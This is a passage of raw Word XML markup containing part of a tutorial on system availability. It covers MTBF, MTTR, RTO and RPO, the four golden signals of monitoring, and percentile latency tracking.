        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTBF (Mean Time Between Failures)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AD9DC4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Average time between system failures. A measure of </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — how often does the system fail?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A3874" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A48238" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>MTBF = Total Uptime / Number of Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73249481" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>High MTBF = failures are rare. Improved by: better code quality, rigorous testing, simpler architectures, chaos engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6203DC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important nuance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> MTBF is an average. A system that fails once every 100 days (MTBF = 100 days) might have very consistent failure patterns, or it might be very reliable for 99 days and then have catastrophic multi-day outages. Averages hide variance. Track the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>distribution</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> of time-between-failures, not just the mean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143AF773" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTTR (Mean Time To Recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533B92A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Average time to restore service after a failure. A measure of </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>recoverability</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — how quickly can you recover?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C53578D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44528727" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Availability ≈ MTBF / (MTBF + MTTR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D17AF39" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>This formula reveals the two levers for availability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9DF33" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Increase MTBF</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (fail less often) → reliability engineering, testing, code quality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE45191" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Decrease MTTR</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (recover faster) → automation, runbooks, on-call training, observability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4519D755" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>For high availability, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reducing MTTR is often more practical</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> than eliminating all failures. Automated failover that recovers in 30 seconds is more valuable than months of effort reducing failure frequency by 10%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B66AAF1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTTR components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB88D41" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTTD (Mean Time To Detect):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Time from failure to alert firing. Improved by better monitoring, lower alert thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0FEF2C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTTI (Mean Time To Investigate):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Time from alert to root cause identification. Improved by better observability (tracing, structured logs, dashboards), runbooks, experienced on-call engineers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31574EDD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTTF (Mean Time To Fix):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Time from root cause identification to fix deployed. Improved by automation (auto-rollback, auto-failover), pre-tested runbooks, blue-green deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7952FE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RTO (Recovery Time Objective)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3271CAE4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>maximum acceptable time</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> for service restoration after a failure. An SLA-level commitment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528166F7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>"After a primary database failure, service must be restored within 60 seconds."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4957FF46" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>"After a full region failure, service must be restored within 15 minutes."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE90FB3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>RTO drives architectural decisions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C15C0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>RTO &lt; 1 minute → requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>active-active</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> redundancy with automatic failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AB4AC7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>RTO 1–30 minutes → active-passive with automated failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B60A0F1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>RTO 1–4 hours → active-passive with manual failover procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650AFF90" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>RTO &gt; 24 hours → cold standby / backup restoration is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB121F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RPO (Recovery Point Objective)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F33529" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>maximum acceptable data loss</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> measured in time. How old can the most recent backup/replica be at the moment of failure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584B3026" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>RPO = 0 → </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zero data loss</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. Requires synchronous replication. Every write is acknowledged only after it's durably committed to multiple replicas. Highest latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782FBDE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>RPO = 1 second → asynchronous replication with 1-second lag. Acceptable for most applications. Low write latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57055A39" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>RPO = 1 hour → hourly backups acceptable. Much simpler. Used for non-critical data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0363301A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>RPO = 24 hours → daily backups. Only for archival/non-critical systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F38FE6F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RTO and RPO are independent axes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885A984" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC4E17A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">              Low RPO (little data loss)     High RPO (more data loss OK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0AEBD2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Low RTO       Synchronous replication         Async replication +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1405C3B7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>(fast recovery) + hot standby                fast failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C31F096" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="62E791AB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>High RTO      Synchronous replication         Daily backups +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CC2B87" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>(slow recovery) + manual failover            cold standby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAED526" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="195C7CC8">
          <v:rect id="_x0000_i2157" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D33FD59" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Observability for Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B4AEC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>You cannot maintain what you cannot measure. Availability engineering requires deep observability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C628DC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Four Golden Signals (Google SRE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A53B1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Time to serve a request. Crucially: track </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>error latency separately from success latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. A fast error response doesn't mean the system is healthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560989FC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Requests per second. Baseline establishes normal patterns. Anomalies (sudden drop or spike) often signal failures before error rates climb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF7CD6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Errors:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Rate of failed requests. Distinguish between:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5264F3FC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client errors (4xx):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Usually not your fault. Don't page on 404s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F0E703" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server errors (5xx):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Your system's fault. Page on elevated 5xx rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DB171D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Silent errors:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Successful HTTP 200 responses with incorrect data — the hardest to detect, requires application-level correctness checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41126FC7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saturation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> How full is your system? CPU %, memory %, disk %, connection pool utilization, queue depth. Saturation is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>leading indicator</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — it predicts failures before they occur. A system at 95% saturation is one traffic spike away from collapse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5700A1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Percentile Latency vs Averages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C00A70" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Average latency hides tail latency.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> If 99% of requests take 10ms and 1% take 10 seconds, the average is ~110ms — looks fine. But 1% of requests are experiencing terrible performance. At 1000 RPS, that's 10 users per second getting 10-second responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D3E89" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always track:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934CB0F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p50 (median):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Typical user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595EEE9E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p95:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Most users' worst experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F4FA04" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p99:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The "long tail" — frequent enough to matter, bad enough to notice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36284465" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p99.9:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Rare but extreme cases. Important for SLA compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4A178" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p100 (max):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Not statistically meaningful (single worst request), but useful for debugging outliers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15435D13" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
